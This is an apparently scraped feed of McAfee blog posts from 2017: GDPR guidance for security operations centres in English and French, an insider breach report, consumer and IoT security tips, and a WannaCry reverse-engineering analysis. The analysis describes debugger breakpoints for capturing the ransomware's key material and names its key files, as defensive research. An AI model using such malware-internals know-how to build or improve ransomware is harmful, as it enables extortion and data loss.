The post Preparing for GDPR in 2017, Part 4: Your SOC appeared first on McAfee Blogs.

]]>
This is the fourth in a series of blog posts designed to help enterprise security and business executives prepare for GDPR throughout 2017. (Part 1, 2, 3)

One of the key requirements under the new General Data Protection Regulation is breach reporting. Of course, to report a breach implies you have the capability to detect a data breach – and that’s not always easy.

McAfee Labs research discovered that over 53 per cent of all incidents are detected externally. Additionally, a SANS Incident Response survey from 2016 found that only about 16 per cent of security operations centres (SOCs) were considered in a mature state.

From my own experience, many security operations are mostly focused on malware threat hunting with very few use cases for insider threat or data exfiltration. That leads to one more alarming statistic. A 2016 Ponemon report found that only 24 per cent of businesses can identify unauthorised access to critical systems in less than 24 hours.

All of this leads me to believe that most security operations are not ready for GDPR.

In this post, I have outlined a few key steps security operations can take to improve readiness for GDPR.

Understand the Journey:

The first step to improvement is understanding your current state and designing a plan to move forward. I put together this simple three-step model to help organisations assess their current sec ops capability as it relates specifically to data breach detection and response.

In my experience, most customers are somewhere between level one and two but an increasing number are exploring adoption of advanced technologies, like user behaviour analytics, to help detect advanced attacks whether from the inside or outside. More on analytics later.

Getting the Right Data for the Job:

 Without the right visibility into user and data activity, detecting data breaches, or even investigating suspicious activity, becomes near impossible. Most security operations are familiar with the data sources used to hunt malware incidents. Intelligence such as malware indicators of compromise, firewall traffic logs and endpoint AV logs are commonly collected to help investigate or detect compromised machines.

However, identifying unauthorised user behaviour or detecting data exfiltration requires a different level of visibility. Consider adding the following data sources to your SIEM and other data aggregation platforms:

Data loss prevention (DLP)

Endpoint and network DLP sensors provide potential insights into accidental data loss or simple data theft attempts. They are essential logs to investigate a reported breach and to proactively identify an incident.

Identify and access management

Data from access and privilege management systems are necessary to identify or investigate unauthorised access attempts to critical systems.

Database Activity Monitors

Databases are often overlooked as a key data source for detection and response. Yet they often hold the key to detecting a data breach early. Collecting database logs is good but you should augment with specialised sensors that provide other points of visibility.

Analytics for Insights:

What are the right ‘operational insights’ I need in order to identify and validate a data breach? Deriving operational insights from the collected data is the key goal of security operations and often the hardest. Many organisations look for a singular platform to analyse data but the smarter approach is to deploy the right tool for the job.

These are some of the key technology building blocks and their primary role in data breach analysis.

Security information and event management (SIEM)

SIEM platforms aggregate data and provide the diagnostics necessary to rapidly investigate and validate security incidents. Security operations should look for features that simplify data breach investigations, such as pivot functions on user behaviour or those that support the Unified Compliance Framework, to ease reporting efforts.

User behaviour and entity analytics (UEBA)

UEBA platforms, on the other hand, gather data from SIEM or raw event sources and use advanced machine learning techniques to provide indicators of potential insider threat. Security operations should look for solutions with many different behaviour models, particularly models tuned to insider threat kill chain.

Network Behavior Analytics

Network behaviour analysis platforms perform a similar function to UEBA but are focused on network traffic flows. The advanced analytics should be tuned to detect data exfiltration attempts.

These are just a few of the key steps security ops must take to improve their readiness for GDPR.

Please follow my blog on Securing Tomorrow for continuous insights on GDPR and other cyber security issues.

The post Preparing for GDPR in 2017, Part 4: Your SOC appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/safeguard-data/preparing-gdpr-2017-part-4-soc/feed/ 0
Se préparer au RGPD en 2017 – Quatrième partie : votre SOC https://securingtomorrow.mcafee.com/languages/francais/se-preparer-au-rgpd-en-2017-quatrieme-partie-votre-soc/ https://securingtomorrow.mcafee.com/languages/francais/se-preparer-au-rgpd-en-2017-quatrieme-partie-votre-soc/#respond Mon, 12 Jun 2017 15:40:42 +0000 https://securingtomorrow.mcafee.com/?p=75046 Cet article de blog est le quatrième d’une série dont le but est d’aider les dirigeants d’entreprise et les cadres responsables de la sécurité à se préparer au RGPD tout au long de l’année 2017.   L’une des exigences fondamentales du nouveau règlement général sur la protection des données (RGPD) est la notification des violations de …

The post Se préparer au RGPD en 2017 – Quatrième partie : votre SOC appeared first on McAfee Blogs.

]]>
Cet article de blog est le quatrième d’une série dont le but est d’aider les dirigeants d’entreprise et les cadres responsables de la sécurité à se préparer au RGPD tout au long de l’année 2017.

 

L’une des exigences fondamentales du nouveau règlement général sur la protection des données (RGPD) est la notification des violations de données. Bien entendu, pour pouvoir signaler une violation de données, encore faut-il pouvoir la détecter, ce qui n’est pas toujours chose aisée.

Une étude de McAfee Labs a révélé que plus de 53 % des incidents sont détectés par un tiers. De plus, selon une enquête sur la réponse aux incidents réalisée par le SANS Institute en 2016, seuls 16 % environ des centres des opérations de sécurité (SOC) étaient considérés comme matures.

D’après ma propre expérience, nombre de ces centres se consacrent essentiellement à la traque des logiciels malveillants et s’intéressent très peu aux menaces internes ou à l’exfiltration de données. Ce qui nous amène à d’autres statistiques plus alarmantes encore. Selon une étude de 2016 du Ponemon Institute, seuls 24 % des entreprises sont capables d’identifier en moins de 24 heures les accès non autorisés à leurs systèmes critiques.

Tout cela me porte à croire que la plupart des centres des opérations de sécurité ne sont pas prêts pour la conformité au RGDP.

Voici donc quelques mesures que je les encourage à prendre pour améliorer leur état de préparation.

 

Comprendre la transition

La première étape consiste à analyser la situation actuelle de votre entreprise et à élaborer un plan d’évolution. Pour vous aider à évaluer les capacités de vos opérations de sécurité en matière de détection des violations de données et de réponse à ces incidents, je vous propose un modèle simple en trois étapes, illustré ci-dessous.

 

D’après mon expérience, la plupart des clients se situent entre les niveaux 1 et 2. Toutefois, ils sont toujours plus nombreux à envisager l’adoption de technologies avancées, comme l’analyse du comportement des utilisateurs, pour mieux détecter les attaques avancées, commises tant en interne que depuis l’extérieur de l’entreprise. Je reviendrai sur les fonctions d’analyse plus tard.

 

Obtenir les données adaptées à la tâche

Sans une visibilité parfaite sur les activités des utilisateurs et sur les données, la détection des violations de données, ou même l’analyse des activités suspectes, est pratiquement impossible. La plupart des centres des opérations de sécurité connaissent bien les sources de données utilisées pour effectuer des recherches sur les incidents impliquant des logiciels malveillants. Des informations de cyberveille sont fréquemment collectées pour détecter les ordinateurs compromis et mener l’enquête. Il s’agit entre autres des indicateurs de compromission signalant la présence de logiciels malveillants, des journaux de trafic des pare-feux et des journaux des antivirus déployés au niveau des terminaux.

L’identification des comportements utilisateur non autorisés et la détection de l’exfiltration de données exigent cependant un tout autre niveau de visibilité. Songez à ajouter les sources de données suivantes à votre solution SIEM et à d’autres plates-formes d’agrégation des données :

 

Prévention des fuites de données (DLP) : Les capteurs DLP au niveau des terminaux et du réseau fournissent des informations potentiellement significatives sur les fuites de données accidentelles ou de simples tentatives de vol de données. Ces informations sont conservées dans des journaux essentiels pour l’investigation d’une compromission signalée et l’identification proactive d’un incident.

 

Identification et gestion des accès : Les données issues des systèmes de gestion des accès et des privilèges sont nécessaires pour identifier ou analyser les tentatives d’accès non autorisé aux systèmes critiques.

 

Surveillance de l’activité des bases de données : Il est fréquent que l’on néglige les bases de données en tant que source de données essentielle pour la détection et la réponse aux incidents. Or, elles contiennent les informations qui permettent de déceler très tôt une violation de données. Il est donc utile de collecter les journaux de bases de données, mais ils doivent absolument être complétés par les renseignements issus de capteurs spécialisés afin d’obtenir d’autres angles de visibilité.

Fonctions analytiques pour des renseignements pertinents

Quelles sont les informations opérationnelles précises dont j’ai besoin pour identifier une violation de données et confirmer qu’elle s’est bien produite ? Tirer des conclusions pertinentes sur le plan opérationnel à partir des données collectées est le principal objectif des centres des opérations de sécurité et, bien souvent, le plus difficile à réaliser. De nombreuses entreprises veulent une plate-forme unique pour analyser les données, mais il est plus judicieux de déployer l’outil spécialement conçu pour la tâche.

Quelques-unes des technologies fondamentales ainsi que la principale fonction qu’elles assurent dans le cadre de l’analyse des violations de données sont décrites ci-dessous.

 

Gestion des événements et des informations de sécurité (SIEM) : Les plates-formes SIEM agrègent les données et fournissent les diagnostics nécessaires pour analyser et valider rapidement les incidents de sécurité. Pour les centres des opérations de sécurité, des fonctions qui simplifient les investigations en cas de violation de données sont indispensables pour faciliter la production de rapports. Il s’agit notamment de l’analyse croisée des comportements des utilisateurs ou de fonctions prenant en charge le cadre UCF (Unified Compliance Framework).

 

Analyse du comportement des utilisateurs et des entités (UEBA) : Les plates-formes UEBA rassemblent quant à elles des données à partir de solutions SIEM ou de sources de données d’événement brutes. Elles recourent à des techniques avancées d’apprentissage automatique pour fournir des indicateurs de menaces internes potentielles. Les centres des opérations de sécurité doivent privilégier une solution qui inclut différents modèles comportementaux, lesquels doivent être adaptés à la chaîne de frappe des menaces internes.

 

Analyse du comportement sur le réseau : Les plates-formes d’analyse du comportement sur le réseau remplissent une fonction similaire aux plates-formes UEBA, mais se focalisent sur les flux de trafic réseau. L’analyse avancée doit être optimisée pour détecter les tentatives d’exfiltration de données.

Ce ne sont là que quelques-unes des principales mesures que les responsables des SOC doivent prendre pour améliorer leur état de préparation au RGPD.

Suivez mon blog Securing Tomorrow pour rester au fait du RGPD et des grands enjeux de la cybersécurité.

The post Se préparer au RGPD en 2017 – Quatrième partie : votre SOC appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/languages/francais/se-preparer-au-rgpd-en-2017-quatrieme-partie-votre-soc/feed/ 0
Employee at Trios Health snoops on data of 600 patients https://securingtomorrow.mcafee.com/business/safeguard-data/employee-at-trios-health-snoops-on-data-of-600-patients/ Fri, 09 Jun 2017 21:09:28 +0000 https://securingtomorrow.mcafee.com/?p=74980 An employee at Trios Health, which is anchored by Trios Southridge Hospital in Washington State, was using its electronic health record system not just to perform job duties but to also look up information on patients outside of the employee’s job function. The incident is the latest in a spate of breaches at healthcare organizations …

The post Employee at Trios Health snoops on data of 600 patients appeared first on McAfee Blogs.

]]>
An employee at Trios Health, which is anchored by Trios Southridge Hospital in Washington State, was using its electronic health record system not just to perform job duties but to also look up information on patients outside of the employee’s job function.

The incident is the latest in a spate of breaches at healthcare organizations by insiders; it is the fifth such incident that Health Data Management tracked in May.

The Trios Health breach was discovered by its health information management department on March 14. Compromised data included dates of service, diagnoses, demographic information, Social Security numbers, driver’s license numbers, phone numbers and email addresses.

After an investigation, the organization put in new EHR use restrictions to staff within the employee’s department and terminated the employee. The investigation continues, as does additional privacy training and new standard auditing processes to protect PHI. Notification letters to about 600 affected patients started being mailed on May 29.

Trios Health is offering a year of identity theft, credit and fraud monitoring protection services for affected patients through Identity Force. Spokespersons for the organization did not respond to a request for additional information.

Other breaches at healthcare organizations of protected health information caused by insiders include the following:

  • At Med Center Health in Kentucky, an employee took data on two occasions to build an outside business.
  • Beacon Health System in Indiana discovered an employee had been accessing patient emergency department records for three years without permission or a reason to view them.
  • A volunteer at NYC Health + Hospitals inadvertently caused a breach because she handled protected health information before being fully vetted and trained by the human resources department.
  • Two employees in the patient transport department at Vanderbilt University Medical Center were inappropriately accessing patient records by obtaining more information than needed to do their jobs.

 

This article was written by Joseph Goedert from Information Management and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The post Employee at Trios Health snoops on data of 600 patients appeared first on McAfee Blogs.

]]>
How to Avoid Falling for a Fake Ad Scam https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/avoid-falling-fake-ad-scam/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/avoid-falling-fake-ad-scam/#respond Fri, 09 Jun 2017 18:58:02 +0000 https://securingtomorrow.mcafee.com/?p=74971 They say impersonation is the sincerest form of flattery, but when it comes to the internet, copy cats don’t always have the best intentions. The act of duping someone on the web is simple, and unfortunately, common as of late. Recently, we’ve seen ads show up across social media sites and, websites claiming to be …

The post How to Avoid Falling for a Fake Ad Scam appeared first on McAfee Blogs.

]]>
They say impersonation is the sincerest form of flattery, but when it comes to the internet, copy cats don’t always have the best intentions. The act of duping someone on the web is simple, and unfortunately, common as of late. Recently, we’ve seen ads show up across social media sites and, websites claiming to be from well-established companies, when in reality they’re quite the opposite. What’s more, these bogus ads aren’t only fooling users with misleading information, but they could be potentially impacting their personal security as well.

This past week, McAfee saw this kind of scam impact our customers firsthand, as a few people mentioned on Twitter they were duped by ads pretending to be our antivirus product. As to be expected, most were concerned because these fake ads could potentially have a malicious intent.

And unfortunately, sometimes they do. One user told us they had unwittingly purchased a Groupon for McAfee, only to find out she was being scammed and possibly infected with malware to boot (which has since been reported to Groupon).

We’re just one of the many brands out there being negatively impacted by these bogus ads, which can ultimately harm both consumers and businesses. So, now the question is, what can people do to ensure they avoid fake ads, and not risk their personal security? We have a few tips on how to combat this scam:

-Go straight to the source. Advertisements are a great way to get the word out about a product, but if you see an ad and know you’re interested in a solution, navigate directly to the company’s website to look into their offerings. That way, you can know you’re buying from a trusted source.

-See what the company has to say. At McAfee, both our technical support team and social team have helped clarify with consumers whether a deal or ad is one of our own. So, if you’re ever unsure of an offering, reach out directly to a company and ask about it before you pursue it.

-Stay secure while you browse. Sometimes it’s hard to identify whether a website is full of fake ads, or whether it can be trusted or not. So, add an extra layer of security to your browser, and surf the web safely by utilizing McAfee SiteAdvisor.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post How to Avoid Falling for a Fake Ad Scam appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/avoid-falling-fake-ad-scam/feed/ 0
4 Tips to Secure Your IoT Deployment https://securingtomorrow.mcafee.com/business/optimize-operations/4-tips-to-secure-your-iot-deployment/ Thu, 08 Jun 2017 22:17:12 +0000 https://securingtomorrow.mcafee.com/?p=74952 After years of delays and false starts, 2017 is supposed to be the year where the Internet of Things (IoT) truly starts to become a ubiquitous part of our lives. But while progress has been made, deploying IoT devices has been slowed by various concerns, of which the biggest are the very real security concerns …

The post 4 Tips to Secure Your IoT Deployment appeared first on McAfee Blogs.

]]>
After years of delays and false starts, 2017 is supposed to be the year where the Internet of Things (IoT) truly starts to become a ubiquitous part of our lives. But while progress has been made, deploying IoT devices has been slowed by various concerns, of which the biggest are the very real security concerns around any IoT network.

Any IoT breach can carry serious consequences. A survey released today found that “Almost half of all companies in the US using an IoT network have been the victims of recent security breaches,” which can cost smaller companies around 13 percent of their annual revenue. Each of the tens of billions devices which make up IoT networks are a security threat, and the network is only as strong as its least protected device.

None of this takes away from the IoT’s benefits. But if companies want to use the IoT without being worried about threats like ransomware or privacy breaches, there are some critical steps in order to ensure your network and organization’s security.

1. Prioritize your devices

A February estimate of IoT forecasts that there will be 8.4 billion connected things worldwide in 2017 and that this number will increase to 20 billion by 2020. But just because a device can be connected to the Internet does not mean it should. And each one of those devices represents a security threat, as shown by cyberattacks where hackers took down major websites like the New York Times by hacking baby monitors and webcams.

I did not make that last sentence up. Each one of these devices represents a risk. And newer, more innovative devices using the IoT are more problematic because toaster and refrigerator manufacturers do not possess the same technological knowledge needed to protect their devices which larger tech companies have.

If you are creating a network with an IoT signal booster, whether for your home or your business, each and every device added is a potential security risk. Consequently, take the time to ask yourself if you really need that new device which boasts Internet connectivity to be connected to the Internet. If you cannot think of a good reason, then do not connect it. As so many more companies create new devices as part of the IoT, users have to realize that some devices are not worth the risk.

2. Hold cyber security drills

You have probably heard stories about how some businesses pay hackers to try and break into their business so they know what their weaknesses are. Such an approach may be a bit extreme, but a business should consider holding cyber security drills in order to identify weak IoT devices and how secure your system is.

Drills are not just about knowing your cyber security weaknesses. They are about ensuring that everyone knows what to do in the event of a breach. Businesses should have a plan for a data breach or hacking just as a business in Japan should have a plan for what to do in the case of an earthquake. If a hacker breaks into your business through your IoT devices and uncovers data, testing beforehand should make it clear what sort of response your business should give and what sort of data is the most likely to be at risk.

3. Communication within the business

As noted above, a major threat with IoT security is that there are a lot of IoT-related devices out there where security is a secondary concern for the device makers and tacked on at the end. This cannot happen if you are deploying an IoT network yourself. Leadership must be in constant communication with their IT departments so that everyone is on the same page.

This may seem obvious, but IT departments everywhere have always complained about how leadership does not understand the security risks they are going under, and IoT will just make this worse. I have personally heard in certain companies the idiotic paradigm of leaders who say the IT department is pointless when things are going fine, and then complain how they are not doing their job when things are going badly.

The IoT necessitates further cooperation between IT and the highest levels of leadership to know what security measures should be implemented for your business. Get on it.

4. Change passwords

A basic example of the lack of communication between leadership and IT concerns passwords. Most IT professionals know that it is important to have strong passwords which are changed regularly, but leadership can chafe at trying to remember those more complicated passwords. But a strong password really matters for IoT devices. Many of them come with a default password, but businesses never bother to change them as they are unaware of the security risks.

Passwords and encryptions remain some of the most basic yet critical aspects to protecting your devices. Talk with IT about ensuring that all of your devices carry strong protection and make sure it is regularly changed.

 

This article was written by Gary Eastwood from CIO and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The post 4 Tips to Secure Your IoT Deployment appeared first on McAfee Blogs.

]]>
Is WannaCry Really Ransomware? https://securingtomorrow.mcafee.com/executive-perspectives/wannacry-really-ransomware/ https://securingtomorrow.mcafee.com/executive-perspectives/wannacry-really-ransomware/#respond Thu, 08 Jun 2017 16:26:14 +0000 https://securingtomorrow.mcafee.com/?p=74857 Ransomware follows a relatively simple model: data is encrypted, the victim pays, data is decrypted. At least that is what those who create ransomware want you to believe. This was also our assumption when we began our analysis of WannaCry—that those behind the campaign would decrypt victims’ data once they received payment. However, for a campaign with incredibly effective propagation techniques, reasonable key and data management, and a working anonymous communication fabric with Bitcoin payments, we found a major flaw: The WannaCry attackers appear to be unable to determine which users have paid the ransom and they cannot decrypt on a per-user basis.

The post Is WannaCry Really Ransomware? appeared first on McAfee Blogs.

]]>
This post summarizes the significant efforts of a McAfee threat research team that has been relentless in its efforts to gain a deeper understanding of the WannaCry ransomware. We would like to specifically acknowledge Christiaan Beek, Lynda Grindstaff, Steve Grobman, Charles McFarland, and Kunal Mehta for their efforts.

Ransomware follows a relatively simple model: data is encrypted, the victim pays, data is decrypted. At least that is what those who create ransomware want you to believe. This was also our assumption when we began our analysis of WannaCry—that those behind the campaign would decrypt victims’ data once they received payment. However, for a campaign with incredibly effective propagation techniques, reasonable key and data management, and a working anonymous communication fabric with Bitcoin payments, we found a major flaw: The WannaCry attackers appear to be unable to determine which users have paid the ransom and they cannot decrypt on a per-user basis.

Technical summary

Our analysis into the encryption and decryption functions within WannaCry reveals an effective tool set. The authors:

  • Created an 8-byte unique identifier (via CryptGenRandom) that identifies the current machine and all the encrypted files on that machine. This ID is used in all communications with the back end and is intended to allow per-user decryption. (See “Can the attackers be contacted?” for details.)
  • Practiced reasonable data sanitization techniques to prevent the recovery of key material. (See “Does WannaCry prevent recovery of key material?”)
  • Followed reasonable practices to prevent the recovery of plain-text file data. (See “Does WannaCry prevent recovery of file data?”)
  • Developed a (somewhat unreliable) back end that keeps track of which users have encrypted files. (See “Can the authors respond? Can they return a private key?”)
  • Made file decryption possible, provided that the “Check Payment” interaction with the back end results in the decrypted key being written to 00000000.dky. The authors know if the returned data is a key or a message to be displayed to the user. The authors must have tested this at least once, and have thus tested full decryption where the need for the correct private key was clearly known. (See “Recovering the user’s private key”)
  • WannaCry appears to have been written by (at least] two authors or teams with different motives:
    • One author favored Win32 APIs and wrapping those APIs or using object orientation.
    • The other author favored C, common APIs (such as fopen), and long procedural functions. They may have been responsible for weaponizing the file encryptor/decryptor, but we do not know. If we are correct, this code probably introduced the unique ID idea but the interface was not updated to include a way to associate the ID with the user’s Bitcoin wallet.

The WannaCry authors demonstrated good technical governance, for example, the key handling, buffer sanitization, and private key security on disk using a strongly encrypted format. It is odd that with such good governance, the same group neglected to include something as essential as a unique ID for a user (or instance of attack) because this is mandatory to decrypt a specific user’s files. While much of the initial analysis described the WannaCry campaign as “shoddy,” the use of good technical governance suggests that there are elements of this campaign that are well implemented.

This competence raises doubts that the campaign was shoddy. Given the level of capability demonstrated, we would expect the developers would have found and fixed basic errors. Indeed, could the inclusion of these basic errors be an attempt to make the campaign appear amateur? Without apprehending those behind the campaign, it is impossible to know their motivation; yet a thorough analysis of the technical artefacts questions the shoddy theory.

 

Motivations

What were the attackers’ motives? Is this real ransomware or something else? For a particular ransomware family to make money in the long term, it must be able to encrypt and decrypt files, and have a reputation that once payment is sent, data can be recovered.

We have identified three potential motives:

  • To make money
    • WannaCry has the key components required for a financially successful campaign—including propagation, key management, data sanitization techniques to prevent data and key recovery, anonymous payment, and messaging and decryption infrastructure.
    • To keep ransom payments flowing, the authors used current messaging infrastructure to ask users to send their Bitcoin wallet IDs to the attackers. This is the same messaging infrastructure that ultimately delivers the user’s private key, allowing full decryption.
    • However, there is limited evidence from the field that payment yields data decryption.
  • To test key components of the ransomware
    • This is likely because the malware contains almost no reverse engineering and debugging protection.
    • We have already seen new WannaCry variants that are harder to analyze because components download 24 hours or so after infection time.
  • To disrupt
    • Ransomware as a destructive mechanism. The use of ransomware to destroy or generate noise, though not common, would be a particularly effective tactic.

Determining the authors intent is not trivial, and likely not possible with the information available. However, to get closer to an answer, the question we need to answer is whether WannaCry is fully functional. Analyzing that leads to a few detailed questions that we explored:

  • Can WannaCry decrypt files?
  • Can the authors be contacted?
  • Can the authors respond? Can they return a private key?
  • Does WannaCry prevent the recovery of files?
  • Does WannaCry prevent the recovery of key material?

Is WannaCry fully functional?

WannaCry can communicate with a back end that maintains its state and prevents the recovery of key material and file data. If one has the user’s private key, the user’s data can be recovered. Despite its bugs and design issues, WannaCry is effective. It is not high quality or well implemented, but it is  effective.

Can WannaCry decrypt files?

The short answer is Yes. WannaCry’s encryption, key management, and file formats have been documented by McAfee Labs, so we will not cover that here. Instead, we will focus on the decryption tool, which we know makes use of the following API sets:

  • Microsoft’s crypto APIs.
    • CryptGenKey, CryptGenRandom, CryptExportKey, CryptImportKey, CryptEncrypt, CryptDecrypt, etc.
  • Microsoft’s file management APIs.
    • CreateFileW, ReadFile, WriteFile, CloseHandle, etc.
  • C runtime library file APIs
    • fopen, fread, fwrite, fflush, fclose, etc.

Using WinDbg or IDA Pro, we can set conditional breakpoints on the APIs used by @WanaDecryptor@.exe and dump out useful information. Given the lack of debugging protection in the ransomware, this is one of the fastest ways to understand WannaCry’s behavior.

Sample decryption

To encourage users to pay the ransom, the decryption tool @WanaDecryptor@.exe can decrypt a small number of files for free. After the “free” files have been decrypted, the decryptor looks for the file 00000000.dky, which should contain the user’s private key. If found, this key is used to decrypt all files on the system. If we have the user’s private key, can we decrypt all files?

Recovering the user’s private key

To prove that decryption is possible, we need the private key:

  • Break on CryptGenKey and get the handle to any created key pair.
  • Break on CryptExportKey and watch the export of the public and private keys to memory.
    • Here we can steal the private key and check if decryption works.
  • [Optionally] put break points showing the encryption of the private key with the attacker’s public key (hardcoded within the encryptor binary), and save it to disk in 00000000.eky.

To analyze the key creation, we can use the following breakpoints:

Figure 1: Crypto API breakpoints for key import and export.

As WannaCry initializes, it calls CryptGenKey to generate a new random key, the handle to which is returned in the fourth parameter.


Figure 2: Creating a new random key.

Next, WannaCry exports the public key from the generated key and saves it to the file 00000000.eky. Note the presence of 0x06 and RSA1. This indicates that the exported key blob is a public key. To view the key blob, save the address of the buffer and buffer size in temporary registers, allow the function to return, and dump the key blob using the address and size values from the temporary registers.

Figure 3: Capturing the user’s public key.

Next, WannaCry exports the private-public key pair to memory. Note the presence of 0x07 and RSA2 in the exported buffer.

Figure 4: Capturing the user’s private-public key pair.

Immediately afterward, WannaCry encrypts the user’s private key with the attacker’s public key and writes the file to 00000000.eky. The contents of this file are sent to the attackers when the user clicks “Check Payment” (as discussed further in “Can the attackers be contacted?”).

At this moment, the private-public key pair is easily recoverable, so we can issue a command to dump that memory to a file, as shown below:

Figure 5: Writing the private key to disk from WinDbg.

In Figure 5, we have given the private key almost the correct name. If the file 00000000.dky exists and contains a valid private key that can decrypt files, WannaCry will abort its encryption run. To decrypt files, rename the file to 00000000.dky once all files have been encrypted, and click on Decrypt.

Figure 6: Dialog after WannaCry successfully decrypts all files.

Based on this analysis, WannaCry is capable of per-user decryption, provided that WannaCry can send the user’s private key to the back end, receive the private decrypted key, and place it in the correct location.

 

Can the attackers be contacted?

WannaCry provides two methods of communication with the attackers: the “Contact Us” link and the “Check Payment” button on the main decryptor interface, shown below in Figure 7.

Figure 7: WannaCry’s Decryptor interface.

If WannaCry allowed recovery, both interface controls should function. Assuming that all communication is over standard network sockets, we can inspect the traffic in real time using WinDbg/IDA Pro with the breakpoints in Figure 8.

Figure 8: Breakpoints for analyzing network traffic.

Our goal is to determine what is being sent to and received from the back end. The detail is not shown here, but WannaCry makes use of TOR to anonymize communications with the attackers, cycling through many TOR servers. We looked for the user’s private key being sent to the back end, where we expected it to be decrypted and sent back if the user had paid the ransom (or if the attackers had decided to randomly decrypt a user’s key). We found one message that was large enough. An example is shown in Figure 9.

Figure 9: A large and interesting buffer sent to the back end.

However, the data did not match any part of the user’s private key stored on disk; could this communication be encrypted? Looking at the call stack, we saw several frames:

Figure 10: Post encryption send call stack.

Looking at the previous frame, we saw a simple wrapper around ws2_32!send, so this is not an encryptor.

Figure 11: ws2_32!send wrapper.

Looking at the frame before the send wrapper in Figure 11, we found a reasonably long function beginning at 0x0040d300 that appears to be responsible for obfuscating the buffer, and we confirmed that using IDA Pro with a second breakpoint, as shown below:

Figure 12: Message obfuscator function breakpoint.

Rerunning our Check Payment debugging run, our new breakpoint fired and revealed the message to be sent prior to obfuscation:


Figure 13: Message to be sent to back end.

The message encodes information that identifies the user. We color-coded the message components in Figures 13 and 15:

  • Green: The 8-byte unique ID stored in the first 8 bytes of 00000000.res. This is created by a call to CryptGenRandom during WannaCry’s initialization and persists for the life of the attack.
  • Orange: The computer name retrieved with GetComputerNameA.
  • Red: The user’s name retrieved by GetUserNameA.
  • Bold: The Bitcoin wallet ID that the user should have sent money to, and the amount that the user should have paid.
  • Cyan: The encrypted user’s private key as read from 00000000.eky.

Based on the message content, it is reasonable to assert that the attacker’s back end receives all the information required to identify users who have paid the ransom, and should be able to perform per-user decryption, provided there is a mechanism for users to tie their Bitcoin transfers to the 8-byte unique ID that represents their specific encryption instance. However, we found no mechanism to do this and there are no interface elements or instructions to help.

Running the same experiment using the Contact Us interface shown in Figure 14, we sent a message “Hey! Can I have my files back?” to the attackers, and using our breakpoint from Figure 12, we determined that a common messaging framework is used.

Figure 14: Messaging interface.


Figure 15: Message sent to back end.

The results in Figure 15 show:

  • Both Check Payment and Contact Us appear to use a common messaging format
    • 8-byte unique ID, machine name, username is always sent.
    • The payload can vary according to message type.

As a result, we conclude that the attackers should have been able to uniquely identify a user but they clearly omitted a mechanism to tie a payment to an ID, making per-user decryption technically impossible.

Can the authors respond? Can they return a private key?

Shortly after its release, Check Payment began returning a message to users instructing them to use the Contact Us mechanism to send the users’ Bitcoin wallet addresses, as shown in Figure 16.

Figure 16: Request for a Bitcoin wallet address.

This message confirms that the attackers can respond. It also gives us an opportunity to analyze the flow of Check Payment messages. Using the same send and recv breakpoints from Figure 8, we received the following obfuscated message:

Figure 17: Encrypted response received from attackers.

Using the following breakpoint, we then watched for that data being written to the obfuscated buffer; if the obfuscation removal occurs in place, we should be able to look at the decrypted buffer.

Figure 18: Message decryption breakpoint.

Once the breakpoint fires, we saw that the message was modified in place:

Figure 19: In-place decryption of the encrypted message.

Our analysis of the function in question in WinDbg and IDA Pro indicated that on return the message was in plain text. Issuing the gu command to step out of the function, we saw the message decrypted, as shown in Figure 20.

Figure 20: Decrypted check-payment message.

This is the same message that we saw displayed in the dialog box, so end-to-end communication is working. But, how is this message used? Again, we made use of a hardware breakpoint, as shown in Figure 21.

Figure 21: Hardware breakpoint to track the decrypted message.

The preceding breakpoint triggers during a call to fwrite to 0000000.dky; the message is written to a file that should contain the user’s private key, as shown below in a subsequent call to WriteFile as part of fwrite, fflush.

Figure 22: Entire message being written to 00000000.dky

The entire message, or whatever was sent back to the decryptor, is written to the file 00000000.dky. Thus we conclude that Check Payment should return a crypto API key blob for the user’s private key. By enabling our key import breakpoint shown in Figure 1, we verified this, as shown below:

Figure 23: The decrypted message imported as a key in CryptImportKey.

Note the value of eax at the bottom of Figure 23 after CryptImportKey has returned: eax is 0, which means that CryptImportKey failed. If CryptImportKey fails, then WannaCry eventually deletes 00000000.dky and displays the message to the user. If CryptImportKey succeeds, the user can successfully decrypt all the files.

From this analysis, we conclude:

  • The WannaCry communication fabric is active and can return messages.
  • The WannaCry back end is live and tracking users because the help message is returned only once.
  • The WannaCry client expects that a message or private key can be returned from the back end:
    • If the message is not a private key (CryptImportKey fails), the client assumes the message is text that should be shown to the user.
    • Private keys are left on disk in 00000000.dky and allow the user to decrypt their files.

Decryption does not work because the authors omitted a link between payment and the unique ID. But what happens if a user follows the instructions and sends the Bitcoin wallet ID to the attackers? Can the victim decrypt files? So far, a tiny sample of victims have reported the decryption of files, but this appears not to be tied to the payment-making function.

Although the message indicates that a user may be able to get the files back (which supports the theory of shoddy design), our limited testing indicated that decryption keys are not returned and files cannot be restored even after payment, which adds weight to the possibility that WannaCry is a prank or test.

 

Does WannaCry prevent recovery of file data?

Yes and no. There has been a lot of excellent research showing that in some circumstances, files are recoverable:

  • Files on removable and nonsystem volumes.
  • Read-only files.
  • Temporary files.

Files stored in the Desktop and Documents folders are the hardest to recover. What does this mean for our theories? Both are still supported:

  • Developer incompetence: Incorrectly deleting and overwriting original files indicates a hurried or poor engineer.
    • There is a difference between not realizing that per-user file decryption can never work without the unique ID and running into filesystem processing bugs for large batch operations; errors in batch processing are much easier to explain.
  • Prank: The techniques for preventing recovery support the theory that the developers did not go to great lengths to prevent recovery from unpredictable folders and devices:
    • Removable, network, and fixed nonsystem volumes may support file carving as a recovery technique. This is also true for devices that make use of wear leveling.
    • Online storage folders and some versioning tools may provide alternative recovery mechanisms for files.
    • Desktop and documents folders are commonly file locations. Many users would not be able to recover most of their files.

We do not believe that WannaCry file data recovery prevention strongly supports either thesis.

 

Does WannaCry prevent recovery of key material?

The most important key for data recovery is the user’s private key. We used hardware breakpoints to see what happens to the exported key blob in our earlier example, as shown below:

Figure 24: Hardware breakpoint to trigger on writes to the key blob.

When this breakpoint fires, we found the following code zeroing out the exported key blob:

Figure 25: Assembly of code that modifies the exported key blob.

